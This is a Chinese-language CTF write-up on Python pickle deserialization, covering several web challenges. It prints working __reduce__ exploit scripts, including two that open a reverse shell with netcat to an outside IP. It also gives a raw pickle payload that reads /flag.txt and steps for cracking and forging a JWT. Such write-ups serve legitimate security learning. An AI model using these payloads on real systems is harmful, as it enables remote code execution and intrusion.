LOADING...

dadada~

loading

Python反序列化-wp

2023/2/12 关于web安全 Python

CTFSHOW-web277

  • 源码找到<!--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m) -->

  • 传入一个data,base64解码后反序列化

  • 没有回显,所以需要反弹shell:

    import base64
import pickle


class shell(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 43.143.175.158 6666 -e /bin/sh')",))

k = shell()
print(base64.b64encode(pickle.dumps(k)))

CTFSHOW-web278

  • 提示过滤了os.system,换成os.popen
  • 然后同上

[watevrCTF-2019]Pickle Store

  • 打开是个什么商店的页面,随便买点东西抓个包,cookie很像base64,但是解出来是一团乱码

  • 直接解码后反序列化:

    import pickle
import base64

enc = "gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu"

print(pickle.loads(base64.b64decode(enc)))

  • 输出:{'money': 500, 'history': [], 'anti_tamper_hmac': 'aa1ba4de55048cf20e0a7a63b7f8eb62'}

  • 猜测后端肯定也有一个解码反序列化的过程,可以利用__reduce__执行命令

  • 没有回显,考虑反弹shell:

    import base64
import pickle


class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 43.143.175.158 6666 -e/bin/sh')",))


a = A()
print(base64.b64encode(pickle.dumps(a)))

[CISCN2019 华北赛区 Day1 Web2]ikun

  • 页面提示一定要买到 lv6,看源码可以看到lv5.png,然后写脚本找 lv6.png

    import requests

for i in range(2, 200):
    url = 'http://30cb3120-98f3-4cda-bfe4-8ae632607648.node4.buuoj.cn:81/shop?page='
    url += str(i)
    r = requests.get(url)
    # print(r.url)
    # print(r.text)
    if 'lv6.png' in r.text:
        print(r.url)
        exit(1)

  • 找到 lv6 在181页,访问,然后购买,抓包,折扣改的很小,返回这个页面:/b1g_m4mber

  • 显示只有admin可以访问,抓包看到cookie里有:JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSJ9.Xjc37g2j_pU5SFHYwoPSHWJDEmRVPtfHkbFfGPcn4W0

  • 拿去解码,可以看到包含一个username,爆破得到密钥:1Kun

  • 伪造jwt访问,源码里可以找到:

    <a href="/static/asd1f654e683wq/www.zip" ><span style="visibility:hidden">删库跑路前我留了好东西在这里</span></a>

  • 下载源码,在admin.py里找到一处反序列化:

    become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))

  • f12把hidden去掉,然后抓包传:become=ccommands%0Agetoutput%0Ap0%0A%28S%27cat%20/flag.txt%27%0Ap1%0Atp2%0ARp3%0A.,拿到flag

  • exp:

    import commands
import urllib
import pickle
class Try(object):
    def __reduce__(self):
        return (commands.getoutput, ('cat /flag.txt',))


a = Try()
print(urllib.quote(pickle.dumps(a)))